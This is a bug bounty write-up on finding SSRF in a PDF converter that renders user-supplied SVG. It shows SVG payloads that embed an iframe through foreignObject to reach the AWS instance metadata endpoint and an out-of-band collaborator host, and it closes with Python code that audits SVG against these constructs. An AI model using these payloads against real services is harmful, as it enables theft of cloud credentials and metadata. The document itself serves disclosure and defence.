In the name of Allah, the Most Gracious, the Most Merciful

Some of the information in this post, such as the target URL, the endpoint, and several other details, has been modified to protect the privacy of the program.

A while ago, I had the opportunity to do some bug hunting in one of the private programs on Bugcrowd. The program covers a complex application with various features; one of the highlights is converting objects from SVG into PDF, JPG, and PNG files.

When I found a feature that creates PDFs from user-supplied data, I immediately tested it for SSRF by replacing the SVG code in the request with HTML containing an iframe tag pointed at Burp Collaborator.

POST /convert HTTP/2
Host: target.com
Cookie: -
Content-Length: -
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Dnt: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqBdAsEtYaBjTArl3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,eu;q=0.6,ms;q=0.5
Connection: close

------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="svg"


<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--

Unfortunately, the server responded with an error message.

{"message": "Error when converting data."}

It looks like the server only processes input that is a valid SVG file.

After some googling, I found that HTML code can be embedded in SVG using an element named foreignObject.

The <foreignObject> SVG element includes elements from a different XML namespace. In the context of a browser, it is most likely (X)HTML.

Source: https://developer.mozilla.org/en-US/docs/Web/SVG/Element/foreignObject

So I changed the payload to be like this:

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
    <g>
        <foreignObject width="800" height="500">
            <body xmlns="http://www.w3.org/1999/xhtml">
                <iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
            </body>
        </foreignObject>
    </g>
</svg>

After getting a hit on the Burp Collaborator client, I checked the IP address that made the request, and it turned out that the application is hosted on Amazon Web Services; from the User-Agent I noticed that the SVG is rendered using PhantomJS.

So I modified the payload to exfiltrate the metadata of the AWS instance.

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
    <g>
        <foreignObject width="800" height="500">
            <body xmlns="http://www.w3.org/1999/xhtml">
                <iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
            </body>
        </foreignObject>
    </g>
</svg>

And metadata was successfully obtained.
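A pre-render check that a converter could apply to user-supplied SVG, added here as an example; it is not code from the program in this write-up. It uses Python's standard xml.etree parser (assumption: a production deployment would use an entity-hardened parser such as defusedxml) and rejects the constructs the payloads above rely on: foreignObject, elements from non-SVG namespaces, script, and href/src values that point at a network host such as the instance metadata address.

```python
"""Audit user-supplied SVG before it reaches the PDF renderer (added example)."""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

SVG_NS = "http://www.w3.org/2000/svg"
# Elements that let the renderer load HTML, run script or embed documents.
BLOCKED_ELEMENTS = {"foreignObject", "script", "iframe", "object", "embed"}


def _split(tag):
    """Return (namespace, local name) for an ElementTree '{ns}name' string."""
    if tag.startswith("{"):
        ns, local = tag[1:].split("}", 1)
        return ns, local
    return "", tag


def audit_svg(svg_text):
    """Return the reasons this SVG must not be rendered; [] means it passed."""
    problems = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    for el in root.iter():
        ns, local = _split(el.tag)
        # The write-up's payload declares no default namespace, so an
        # un-namespaced <svg> tree is tolerated; any other namespace is not.
        if ns not in ("", SVG_NS):
            problems.append(f"element <{local}> from foreign namespace {ns}")
        if local in BLOCKED_ELEMENTS:
            problems.append(f"blocked element <{local}>")
        for attr, value in el.attrib.items():
            name = _split(attr)[1]          # handles xlink:href as well
            if name in ("href", "src") and urlparse(value).netloc:
                problems.append(f"<{local}> references a network host: {value}")
            elif name.lower().startswith("on"):
                problems.append(f"<{local}> carries event handler {name}")
    return problems


# Constructed sample modelled on the payload in the write-up.
SAMPLE_PAYLOAD = (
    '<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="800" height="500">'
    '<g><foreignObject width="800" height="500">'
    '<body xmlns="http://www.w3.org/1999/xhtml">'
    '<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>'
    '</body></foreignObject></g></svg>'
)

if __name__ == "__main__":
    for reason in audit_svg(SAMPLE_PAYLOAD):
        print("reject:", reason)
```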

SSRF in PDF Renderer using SVG

I immediately reported this finding; it was marked as P1 and rewarded with $2,150.